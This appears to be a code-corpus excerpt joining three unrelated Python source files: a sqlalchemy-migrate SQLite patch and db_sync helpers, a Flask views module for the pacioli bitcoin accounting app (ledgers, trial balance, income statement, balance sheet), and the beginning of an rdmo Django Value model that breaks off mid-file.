self.execute()
def _visit_migrate_unique_constraint(self, *p, **k):
"""Drop the given unique constraint
The corresponding original method of sqlalchemy-migrate just
    raises a NotImplementedError.
"""
self.recreate_table(p[0].table, omit_uniques=[p[0].name])
def patch_migrate():
"""A workaround for SQLite's inability to alter things
SQLite abilities to alter tables are very limited (please read
http://www.sqlite.org/lang_altertable.html for more details).
E. g. one can't drop a column or a constraint in SQLite. The
workaround for this is to recreate the original table omitting
the corresponding constraint (or column).
sqlalchemy-migrate library has recreate_table() method that
implements this workaround, but it does it wrong:
- information about unique constraints of a table
is not retrieved. So if you have a table with one
unique constraint and a migration adding another one
you will end up with a table that has only the
latter unique constraint, and the former will be lost
- dropping of unique constraints is not supported at all
The proper way to fix this is to provide a pull-request to
sqlalchemy-migrate, but the project seems to be dead. So we
can go on with monkey-patching of the lib at least for now.
"""
# this patch is needed to ensure that recreate_table() doesn't drop
# existing unique constraints of the table when creating a new one
helper_cls = sqlite.SQLiteHelper
helper_cls.recreate_table = _recreate_table
helper_cls._get_unique_constraints = _get_unique_constraints
# this patch is needed to be able to drop existing unique constraints
constraint_cls = sqlite.SQLiteConstraintDropper
constraint_cls.visit_migrate_unique_constraint = \
_visit_migrate_unique_constraint
constraint_cls.__bases__ = (ansisql.ANSIColumnDropper,
sqlite.SQLiteConstraintGenerator)
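# Example (sketch): patch_migrate() is meant to be called once, early, before any
# SQLite migration that drops a column or a unique constraint is executed:
#   patch_migrate()
#   # ... then run the migration scripts as usual (e.g. via db_sync below)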
def db_sync(abs_path, version=None, init_version=0):
"""Upgrade or downgrade a database.
Function runs the upgrade() or downgrade() functions in change scripts.
:param abs_path: Absolute path to migrate repository.
:param version: Database will upgrade/downgrade until this version.
                    If None, the database will be updated to the latest
                    available version.
:param init_version: Initial database version
"""
if version is not None:
try:
version = int(version)
except ValueError:
raise exception.DbMigrationError(
message=_("version should be an integer"))
current_version = db_version(abs_path, init_version)
repository = _find_migrate_repo(abs_path)
if version is None or version > current_version:
return versioning_api.upgrade(get_engine(), repository, version)
else:
return versioning_api.downgrade(get_engine(), repository,
version)
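# Example (sketch, hypothetical paths/versions):
#   db_sync('/path/to/migrate_repo')               # upgrade to the latest version
#   db_sync('/path/to/migrate_repo', version=42)   # upgrade or downgrade to version 42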
def db_version(abs_path, init_version):
"""Show the current version of the repository.
:param abs_path: Absolute path to migrate repository
    :param init_version: Initial database version
"""
repository = _find_migrate_repo(abs_path)
try:
return versioning_api.db_version(get_engine(), repository)
except versioning_exceptions.DatabaseNotControlledError:
meta = sqlalchemy.MetaData()
engine = get_engine()
meta.reflect(bind=engine)
tables = meta.tables
if len(tables) == 0:
db_version_control(abs_path, init_version)
return versioning_api.db_version(get_engine(), repository)
else:
# Some pre-Essex DB's may not be version controlled.
# Require them to upgrade using Essex first.
raise exception.DbMigrationError(
message=_("Upgrade DB using Essex release first."))
def db_version_control(abs_path, version=None):
"""Mark a database as under this repository's version control.
Once a database is under version control, schema changes should
only be done via change scripts in this repository.
:param abs_path: Absolute path to migrate repository
:param version: Initial database version
"""
repository = _find_migrate_repo(abs_path)
versioning_api.version_control(get_engine(), repository, version)
return version
def _find_migrate_repo(abs_path):
"""Get the project's change script repository
:param abs_path: Absolute path to migrate repository
"""
global _REPOSITORY
if not os.path.exists(abs_path):
raise exception.DbMigrationError("Path %s not found" % abs_path)
if _REPOSITORY is None:
_REPOSITORY = Repository(abs_path)
return _REPOSITORY
| apache-2.0 | -3,339,525,715,949,184,000 | 35.140288 | 79 | 0.695431 | false |
enikesha/pacioli | pacioli/views.py | 1 | 31775 | # Copyright (c) 2014, Satoshi Nakamoto Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import io
import uuid
import ast
import csv
import calendar
from collections import OrderedDict
from datetime import datetime,date
from flask import flash, render_template, request, redirect, url_for, send_from_directory, send_file
from pacioli import app, db, forms, models
import sqlalchemy
from sqlalchemy.sql import func
from sqlalchemy.orm import aliased
from pacioli.accounting.memoranda import process_filestorage
import pacioli.accounting.ledgers as ledgers
import pacioli.accounting.rates as rates
import pacioli.accounting.valuations as valuations
@app.route('/')
def index():
return render_template("index.html")
@app.route('/Configure')
def configure():
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts')
def chart_of_accounts():
classificationform = forms.NewClassification()
accountform = forms.NewAccount()
subaccountform = forms.NewSubAccount()
subaccounts = models.Subaccounts.query.all()
return render_template("configure/chart_of_accounts.html",
subaccounts=subaccounts,
classificationform=classificationform,
accountform=accountform,
subaccountform=subaccountform)
@app.route('/Configure/ChartOfAccounts/AddClassification', methods=['POST','GET'])
def add_classification():
if request.method == 'POST':
form = request.form.copy().to_dict()
name = form['classification']
parent = form['classificationparent']
parent = models.Elements.query.filter_by(id=parent).one()
parent = parent.name
classification = models.Classifications(name=name, parent=parent)
db.session.add(classification)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/DeleteClassification/<classification>')
def delete_classification(classification):
classification = models.Classifications \
.query \
.filter_by(name=classification) \
.first()
db.session.delete(classification)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/AddAccount', methods=['POST','GET'])
def add_account():
if request.method == 'POST':
form = request.form.copy().to_dict()
name = form['account']
parent = form['accountparent']
parent = models.Classifications \
.query \
.filter_by(id=parent) \
.one()
parent = parent.name
account = models.Accounts(name=name, parent=parent)
db.session.add(account)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/DeleteAccount/<account>')
def delete_account(account):
account = models.Accounts.query.filter_by(name=account).first()
db.session.delete(account)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/AddSubAccount', methods=['POST','GET'])
def add_subaccount():
if request.method == 'POST':
form = request.form.copy().to_dict()
name = form['subaccount']
parent = form['subaccountparent']
parent = models.Accounts.query.filter_by(id=parent).one()
parent = parent.name
subaccount = models.Subaccounts(name=name, parent=parent)
db.session.add(subaccount)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Configure/ChartOfAccounts/DeleteSubAccount/<subaccount>')
def delete_subaccount(subaccount):
subaccount = models.Accounts.query.filter_by(name=subaccount).first()
db.session.delete(subaccount)
db.session.commit()
return redirect(url_for('chart_of_accounts'))
@app.route('/Bookkeeping')
def bookkeeping():
return redirect(url_for('upload_csv'))
@app.route('/Bookkeeping/Memoranda/Upload', methods=['POST','GET'])
def upload_csv():
filenames = ''
if request.method == 'POST':
uploaded_files = request.files.getlist("file[]")
for file in uploaded_files:
process_filestorage(file)
return redirect(url_for('upload_csv'))
memos = models.Memoranda \
.query \
.order_by(models.Memoranda.date.desc()) \
.all()
return render_template('bookkeeping/upload.html',
title = 'Upload',
memos=memos)
@app.route('/Bookkeeping/Memoranda/ExchangeRates')
def exchange_rates():
return render_template("bookkeeping/exchange_rates.html")
@app.route('/Bookkeeping/Memoranda/DownloadRates')
def download_rates():
rates.download_rates()
return redirect(url_for('exchange_rates'))
@app.route('/Bookkeeping/Memoranda/ExchangeRates/Summarize')
def summarize_rates():
rates.summarize_rates("pacioli")
return redirect(url_for('exchange_rates'))
@app.route('/Bookkeeping/Memoranda/ExchangeRates/Import')
def import_rates():
rates.import_rates("pacioli")
return redirect(url_for('exchange_rates'))
@app.route('/Bookkeeping/Memoranda/ExchangeRates/CalculateGains/<method>')
def calc_gains(method):
valuations.calculate_bitcoin_gains(method)
return redirect(url_for('exchange_rates'))
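# Typical exchange-rate workflow (sketch): the four routes above are meant to be hit
# in order: DownloadRates, then Summarize, then Import, and finally
# CalculateGains/<method>, where <method> is whatever costing method
# valuations.calculate_bitcoin_gains accepts (e.g. FIFO or LIFO; an assumption here).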
@app.route('/Bookkeeping/Memoranda/Memos', methods=['POST','GET'])
def memoranda():
memos = models.Memoranda \
.query \
.order_by(models.Memoranda.date.desc()) \
.all()
for memo in memos:
transactions = models.MemorandaTransactions \
.query \
.filter_by(memoranda_id=memo.id) \
.all()
memo.count = len(transactions)
return render_template('bookkeeping/memos.html',
title = 'Memoranda',
memos=memos)
@app.route('/Bookkeeping/Memoranda/Memos/Delete/<fileName>')
def delete_memoranda(fileName):
memo = models.Memoranda \
.query \
.filter_by(fileName=fileName) \
.first()
transactions = models.MemorandaTransactions \
.query \
.filter_by(memoranda_id=memo.id) \
.all()
for transaction in transactions:
journal_entry = models.JournalEntries \
.query \
.filter_by(memoranda_transactions_id=transaction.id) \
.first()
ledger_entries = models.LedgerEntries \
.query \
.filter_by(journal_entry_id = journal_entry.id) \
.all()
for entry in ledger_entries:
db.session.delete(entry)
db.session.commit()
db.session.delete(journal_entry)
db.session.commit()
db.session.delete(transaction)
db.session.commit()
db.session.delete(memo)
db.session.commit()
return redirect(url_for('upload_csv'))
@app.route('/Bookkeeping/Memoranda/Memos/<fileName>')
def memo_file(fileName):
memo = models.Memoranda.query.filter_by(fileName=fileName).first()
fileText = memo.fileText
document = io.StringIO(fileText)
reader = csv.reader(document)
rows = [pair for pair in reader]
return render_template('bookkeeping/memo_file.html',
title = 'Memo',
rows=rows,
fileName=fileName)
@app.route('/Bookkeeping/Memoranda/Memos/Transactions')
def transactions():
transactions = models.MemorandaTransactions.query.all()
for transaction in transactions:
transaction.details = ast.literal_eval(transaction.details)
journal_entry = models.JournalEntries.query.filter_by(memoranda_transactions_id=transaction.id).first()
transaction.journal_entry_id = journal_entry.id
return render_template('bookkeeping/memo_transactions.html',
title = 'Memo',
transactions=transactions)
@app.route('/Bookkeeping/Memoranda/Memos/<fileName>/Transactions')
def memo_transactions(fileName):
memo = models.Memoranda.query.filter_by(fileName=fileName).first()
transactions = models.MemorandaTransactions.query.filter_by(memoranda_id=memo.id).all()
for transaction in transactions:
transaction.details = ast.literal_eval(transaction.details)
journal_entry = models.JournalEntries.query.filter_by(memoranda_transactions_id=transaction.id).first()
transaction.journal_entry_id = journal_entry.id
return render_template('bookkeeping/memo_transactions.html',
title = 'Memo',
transactions=transactions,
fileName=fileName)
@app.route('/Bookkeeping/GeneralJournal/<currency>')
def general_journal(currency):
journal_entries = db.session \
.query(models.JournalEntries) \
.filter(models.JournalEntries.ledgerentries \
.any(currency=currency)) \
.join(models.LedgerEntries) \
.order_by(models.LedgerEntries.date.desc()) \
.all()
for journal_entry in journal_entries:
journal_entry.ledgerentries = [c for c in journal_entry.ledgerentries if c.currency == currency]
return render_template('bookkeeping/general_journal.html',
title = 'General Journal',
journal_entries=journal_entries,
currency=currency)
@app.route('/Bookkeeping/GeneralJournal/Entry/<id>')
def journal_entry(id):
journal_entry = models.JournalEntries.query.filter_by(id = id).first()
ledger_entries = models.LedgerEntries.query.filter_by(journal_entry_id = id).order_by(models.LedgerEntries.date.desc()).order_by(models.LedgerEntries.tside.desc()).all()
transaction = models.MemorandaTransactions.query.filter_by(id=journal_entry.memoranda_transactions_id).first()
memo = models.Memoranda.query.filter_by(id=transaction.memoranda_id).first()
transaction.details = ast.literal_eval(transaction.details)
print(ledger_entries)
return render_template('bookkeeping/journal_entry.html',
title = 'Journal Entry',
journal_entry=journal_entry,
ledger_entries=ledger_entries,
transaction=transaction,
memo=memo)
@app.route('/Bookkeeping/GeneralJournal/<id>/Edit', methods=['POST','GET'])
def edit_journal_entry(id):
journal_entry = models.JournalEntries.query.filter_by(id = id).first()
ledger_entries = models.LedgerEntries.query.filter_by(journal_entry_id = id).order_by(models.LedgerEntries.date.desc()).order_by(models.LedgerEntries.tside.desc()).all()
transaction = models.MemorandaTransactions.query.filter_by(id=journal_entry.memoranda_transactions_id).first()
memo = models.Memoranda.query.filter_by(id=transaction.memoranda_id).first()
transaction.details = ast.literal_eval(transaction.details)
return render_template('bookkeeping/journal_entry_edit.html',
title = 'Journal Entry',
journal_entry=journal_entry,
ledger_entries=ledger_entries,
transaction=transaction,
memo=memo)
@app.route('/Bookkeeping/GeneralLedger/<currency>')
def general_ledger(currency):
accountsQuery = db.session\
.query(models.LedgerEntries.ledger)\
.group_by(models.LedgerEntries.ledger).all()
accounts = []
for accountResult in accountsQuery:
accountName = accountResult[0]
query = ledgers.query_entries(accountName, 'Monthly', currency)
accounts.append(query)
return render_template('bookkeeping/general_ledger.html',
title = 'General Ledger',
accounts=accounts,
currency=currency)
@app.route('/Bookkeeping/Ledger/<accountName>/<currency>/<groupby>')
def ledger(accountName, currency, groupby):
query = ledgers.query_entries(accountName, groupby, currency)
return render_template('bookkeeping/ledger.html',
title = 'Ledger',
currency=currency,
account=query[0],
ledger_entries=query[1],
groupby = groupby,
accountName=accountName)
@app.route('/Bookkeeping/Ledger/<accountName>/<currency>/<groupby>/<interval>')
def ledger_page(accountName, currency, groupby, interval):
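    # One page of a single ledger account: the interval string is parsed as a specific
    # day ("%m-%d-%Y") or a whole month ("%m-%Y") depending on the requested grouping.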
if groupby == "Daily":
interval = datetime.strptime(interval, "%m-%d-%Y")
year = interval.year
month = interval.month
day = interval.day
ledger_entries = models.LedgerEntries \
.query \
.filter_by(ledger=accountName) \
.filter_by(currency=currency) \
.filter( \
func.date_part('year', models.LedgerEntries.date)==year, \
func.date_part('month', models.LedgerEntries.date)==month, \
func.date_part('day', models.LedgerEntries.date)==day) \
.order_by(models.LedgerEntries.date) \
.order_by(models.LedgerEntries.tside.asc()) \
.all()
account = ledgers.foot_account(accountName, ledger_entries, 'All')
if groupby == "Monthly":
interval = datetime.strptime(interval, "%m-%Y")
year = interval.year
month = interval.month
ledger_entries = models.LedgerEntries\
.query\
.filter_by(ledger=accountName) \
.filter_by(currency=currency) \
.filter( \
func.date_part('year', models.LedgerEntries.date)==year, \
func.date_part('month', models.LedgerEntries.date)==month)\
.order_by(models.LedgerEntries.date) \
.order_by(models.LedgerEntries.tside.desc()) \
.all()
account = ledgers.foot_account(accountName, ledger_entries, 'All')
return render_template('bookkeeping/ledger.html',
title = 'Ledger',
account=account,
ledger_entries=ledger_entries,
groupby2 = groupby,
groupby = 'All',
accountName=accountName,
interval=interval,
currency=currency)
@app.route('/Bookkeeping/TrialBalance/<currency>')
def trial_balance(currency):
accountsQuery = db.session \
.query(models.LedgerEntries.ledger) \
.group_by(models.LedgerEntries.ledger) \
.filter(models.LedgerEntries.currency==currency) \
.all()
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date) + '-'+
func.date_part('month', models.LedgerEntries.date)) \
.filter(models.LedgerEntries.currency==currency) \
.group_by(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
period = datetime.now()
year = period.year
month = period.month
accounts = []
totalDebits = 0
totalCredits = 0
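    # Foot each ledger account for the current month and accumulate the debit and
    # credit column totals; a balanced trial balance has totalDebits == totalCredits.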
for accountResult in accountsQuery:
accountName = accountResult[0]
ledger_entries = models.LedgerEntries \
.query \
.filter_by(ledger=accountName)\
.filter_by(currency=currency) \
.filter( \
func.date_part('year', models.LedgerEntries.date)==year,
func.date_part('month', models.LedgerEntries.date)==month) \
.order_by(models.LedgerEntries.date) \
.order_by(models.LedgerEntries.tside.desc()) \
.all()
query = ledgers.foot_account(accountName, ledger_entries, 'All')
totalDebits += query['debitBalance']
totalCredits += query['creditBalance']
accounts.append(query)
return render_template('bookkeeping/trial_balance.html',
currency=currency,
periods=periods,
period=period,
accounts=accounts,
totalDebits=totalDebits,
totalCredits=totalCredits)
@app.route('/Bookkeeping/TrialBalance/<currency>/<groupby>/<period>')
def trial_balance_historical(currency, groupby, period):
accountsQuery = db.session \
.query(models.LedgerEntries.ledger) \
.group_by(models.LedgerEntries.ledger) \
.filter(models.LedgerEntries.currency==currency) \
.all()
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date) + '-'+
func.date_part('month', models.LedgerEntries.date)) \
.group_by(\
func.date_part('year', models.LedgerEntries.date),\
func.date_part('month', models.LedgerEntries.date)) \
.filter(models.LedgerEntries.currency==currency) \
.all()
period = datetime.strptime(period, "%Y-%m")
year = period.year
month = period.month
day = calendar.monthrange(year, month)[1]
period = datetime(year, month, day, 23, 59, 59)
accounts = []
totalDebits = 0
totalCredits = 0
for accountResult in accountsQuery:
accountName = accountResult[0]
ledger_entries = models.LedgerEntries \
.query \
.filter_by(ledger=accountName) \
.filter_by(currency=currency) \
.filter( \
func.date_part('year', models.LedgerEntries.date)==year, \
func.date_part('month', models.LedgerEntries.date)==month) \
.order_by(models.LedgerEntries.date) \
.order_by(models.LedgerEntries.tside.desc()) \
.all()
query = ledgers.foot_account(accountName, ledger_entries, 'All')
totalDebits += query['debitBalance']
totalCredits += query['creditBalance']
accounts.append(query)
return render_template('bookkeeping/trial_balance.html',
currency=currency,
periods=periods,
period=period,
accounts=accounts,
totalDebits=totalDebits,
totalCredits=totalCredits)
@app.route('/FinancialStatements')
def financial_statements():
return redirect(url_for('income_statement', currency='satoshis'))
@app.route('/FinancialStatements/IncomeStatement/<currency>')
def income_statement(currency):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date),\
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date),\
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
period = datetime.now()
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, period.day, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.filter(models.Classifications.name.in_(['Revenues', 'Expenses', 'Gains', 'Losses']))\
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
net_income = 0
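    # Credit entries add to a subaccount's total and to net income; debit entries
    # subtract from both, so revenues and gains net against expenses and losses.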
for element in elements:
element.classifications = [c for c in element.classifications if c.name in ['Revenues', 'Expenses', 'Gains', 'Losses']]
for classification in element.classifications:
for account in classification.accounts:
for subaccount in account.subaccounts:
subaccount.total = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if period_beg <= c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
subaccount.total += ledger_entry.amount
net_income += ledger_entry.amount
elif ledger_entry.tside == 'debit':
net_income -= ledger_entry.amount
subaccount.total -= ledger_entry.amount
return render_template('financial_statements/income_statement.html',
title = 'Income Statement',
periods = periods,
currency = currency,
elements = elements,
net_income = net_income)
@app.route('/FinancialStatements/IncomeStatement/<currency>/<period>')
def income_statement_historical(currency, period):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
period = datetime.strptime(period, "%Y-%m")
lastday = calendar.monthrange(period.year, period.month)[1]
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, lastday, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.filter(models.Classifications.name.in_(['Revenues', 'Expenses', 'Gains', 'Losses']))\
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
net_income = 0
for element in elements:
element.classifications = [c for c in element.classifications if c.name in ['Revenues', 'Expenses', 'Gains', 'Losses']]
for classification in element.classifications:
for account in classification.accounts:
for subaccount in account.subaccounts:
subaccount.total = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if period_beg <= c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
net_income += ledger_entry.amount
subaccount.total += ledger_entry.amount
elif ledger_entry.tside == 'debit':
net_income -= ledger_entry.amount
subaccount.total -= ledger_entry.amount
return render_template('financial_statements/income_statement.html',
title = 'Income Statement',
periods = periods,
currency = currency,
elements = elements,
net_income = net_income)
@app.route('/FinancialStatements/BalanceSheet/<currency>')
def balance_sheet(currency):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
period = datetime.now()
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, period.day, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
retained_earnings = 0
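    # Roll every ledger entry dated up to the end of the period through
    # subaccount -> account -> classification -> element, counting debits as
    # positive balances and credits as negative ones.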
for element in elements:
element.balance = 0
for classification in element.classifications:
classification.balance = 0
for account in classification.accounts:
account.balance = 0
for subaccount in account.subaccounts:
subaccount.balance = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
element.balance -= ledger_entry.amount
classification.balance -= ledger_entry.amount
account.balance -= ledger_entry.amount
subaccount.balance -= ledger_entry.amount
elif ledger_entry.tside == 'debit':
element.balance += ledger_entry.amount
classification.balance += ledger_entry.amount
account.balance += ledger_entry.amount
subaccount.balance += ledger_entry.amount
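        # The Equity element's net credit balance is captured as retained earnings;
        # only the Assets and Liabilities elements are rendered directly below.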
if element.name == 'Equity':
retained_earnings = -element.balance
print(retained_earnings)
elements = [c for c in elements if c.name in ['Assets', 'Liabilities']]
return render_template('financial_statements/balance_sheet.html',
periods=periods,
currency=currency,
elements=elements,
retained_earnings=retained_earnings,
period=period_end)
@app.route('/FinancialStatements/BalanceSheet/<currency>/<period>')
def balance_sheet_historical(currency, period):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
period = datetime.strptime(period, "%Y-%m")
lastday = calendar.monthrange(period.year, period.month)[1]
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, lastday, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
retained_earnings = 0
for element in elements:
element.balance = 0
for classification in element.classifications:
classification.balance = 0
for account in classification.accounts:
account.balance = 0
for subaccount in account.subaccounts:
subaccount.balance = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
element.balance -= ledger_entry.amount
classification.balance -= ledger_entry.amount
account.balance -= ledger_entry.amount
subaccount.balance -= ledger_entry.amount
elif ledger_entry.tside == 'debit':
element.balance += ledger_entry.amount
classification.balance += ledger_entry.amount
account.balance += ledger_entry.amount
subaccount.balance += ledger_entry.amount
if element.name == 'Equity':
retained_earnings = -element.balance
print(retained_earnings)
elements = [c for c in elements if c.name in ['Assets', 'Liabilities']]
return render_template('financial_statements/balance_sheet.html',
periods=periods,
currency=currency,
elements=elements,
retained_earnings=retained_earnings,
period=period_end)
@app.route('/FinancialStatements/StatementOfCashFlows/<currency>/<period>')
def statement_of_cash_flows(currency, period):
periods = db.session \
.query(\
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.group_by( \
func.date_part('year', models.LedgerEntries.date), \
func.date_part('month', models.LedgerEntries.date)) \
.all()
periods = sorted([date(int(period[0]), int(period[1]), 1) for period in periods])
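    # 'Current' means the month-to-date period ending today; any other value is a
    # "%Y-%m" string selecting a complete historical month.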
if period == 'Current':
period = datetime.now()
lastday = period.day
else:
period = datetime.strptime(period, "%Y-%m")
lastday = calendar.monthrange(period.year, period.month)[1]
period_beg = datetime(period.year, period.month, 1, 0, 0, 0, 0)
period_end = datetime(period.year, period.month, lastday, 23, 59, 59, 999999)
elements = db.session \
.query(models.Elements) \
.join(models.Classifications) \
.filter(models.Classifications.name.in_(['Revenues', 'Expenses', 'Gains', 'Losses']))\
.join(models.Accounts) \
.join(models.Subaccounts) \
.all()
net_income = 0
for element in elements:
element.classifications = [c for c in element.classifications if c.name in ['Revenues', 'Expenses', 'Gains', 'Losses']]
for classification in element.classifications:
classification.balance = 0
for account in classification.accounts:
account.balance = 0
for subaccount in account.subaccounts:
subaccount.balance = 0
subaccount.ledgerentries = [c for c in subaccount.ledgerentries if period_beg <= c.date <= period_end ]
for ledger_entry in subaccount.ledgerentries:
if ledger_entry.currency == currency:
if ledger_entry.tside == 'credit':
classification.balance -= ledger_entry.amount
account.balance -= ledger_entry.amount
subaccount.balance -= ledger_entry.amount
elif ledger_entry.tside == 'debit':
classification.balance += ledger_entry.amount
account.balance += ledger_entry.amount
subaccount.balance += ledger_entry.amount
return render_template('financial_statements/statement_of_cash_flows.html',
period = period,
periods = periods,
currency = currency,
elements = elements,
net_income = net_income)
| bsd-3-clause | 207,046,590,486,542,980 | 43.070735 | 757 | 0.628419 | false |
rdmorganiser/rdmo | rdmo/projects/models/value.py | 1 | 6697 | import mimetypes
from pathlib import Path
import iso8601
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_cleanup import cleanup
from rdmo.core.constants import (VALUE_TYPE_BOOLEAN, VALUE_TYPE_CHOICES,
VALUE_TYPE_DATETIME, VALUE_TYPE_TEXT)
from rdmo.core.models import Model
from rdmo.domain.models import Attribute
from rdmo.options.models import Option
from ..managers import ValueManager
from ..utils import get_value_path
def get_file_upload_to(instance, filename):
return str(get_value_path(instance.project, instance.snapshot) / str(instance.id) / filename)
class Value(Model):
objects = ValueManager()
FALSE_TEXT = [None, '', '0', 'f', 'F', 'false', 'False']
project = models.ForeignKey(
'Project', on_delete=models.CASCADE, related_name='values',
verbose_name=_('Project'),
help_text=_('The project this value belongs to.')
)
snapshot = models.ForeignKey(
'Snapshot', blank=True, null=True,
on_delete=models.CASCADE, related_name='values',
verbose_name=_('Snapshot'),
help_text=_('The snapshot this value belongs to.')
)
attribute = models.ForeignKey(
Attribute, blank=True, null=True,
on_delete=models.SET_NULL, related_name='values',
verbose_name=_('Attribute'),
help_text=_('The attribute this value belongs to.')
)
set_index = models.IntegerField(
default=0,
verbose_name=_('Set index'),
help_text=_('The position of this value in an entity collection (i.e. in the question set)')
)
collection_index = models.IntegerField(
default=0,
verbose_name=_('Collection index'),
help_text=_('The position of this value in an attribute collection.')
)
text = models.TextField(
blank=True,
verbose_name=_('Text'),
help_text=_('The string stored for this value.')
)
option = models.ForeignKey(
Option, blank=True, null=True, on_delete=models.SET_NULL, related_name='values',
verbose_name=_('Option'),
help_text=_('The option stored for this value.')
)
file = models.FileField(
upload_to=get_file_upload_to, null=True, blank=True,
verbose_name=_('File'),
help_text=_('The file stored for this value.')
)
value_type = models.CharField(
max_length=8, choices=VALUE_TYPE_CHOICES, default=VALUE_TYPE_TEXT,
verbose_name=_('Value type'),
help_text=_('Type of this value.')
)
unit = models.CharField(
max_length=64, blank=True,
verbose_name=_('Unit'),
help_text=_('Unit for this value.')
)
external_id = models.CharField(
max_length=256, blank=True,
verbose_name=_('External id'),
help_text=_('External id for this value.')
)
class Meta:
ordering = ('attribute', 'set_index', 'collection_index')
verbose_name = _('Value')
verbose_name_plural = _('Values')
@property
def as_dict(self):
value_dict = {
'id': self.id,
'created': self.created,
'updated': self.updated,
'set_index': self.set_index,
'collection_index': self.collection_index,
'value_type': self.value_type,
'unit': self.unit,
'external_id': self.external_id,
'value': self.value,
'value_and_unit': self.value_and_unit,
'is_true': self.is_true,
'is_false': self.is_false,
'as_number': self.as_number
}
if self.file:
value_dict.update({
'file_name': self.file_name,
'file_url': self.file_url,
'file_type': self.file_type,
'file_path': self.file_path
})
return value_dict
@property
def value(self):
if self.option:
value = self.option.text or ''
if self.option.additional_input and self.text:
value += ': ' + self.text
return value
elif self.file:
return self.file_name
elif self.text:
if self.value_type == VALUE_TYPE_DATETIME:
try:
return iso8601.parse_date(self.text).date()
except iso8601.ParseError:
return self.text
elif self.value_type == VALUE_TYPE_BOOLEAN:
if self.text == '1':
return _('Yes')
else:
return _('No')
else:
return self.text
else:
return None
@property
def value_and_unit(self):
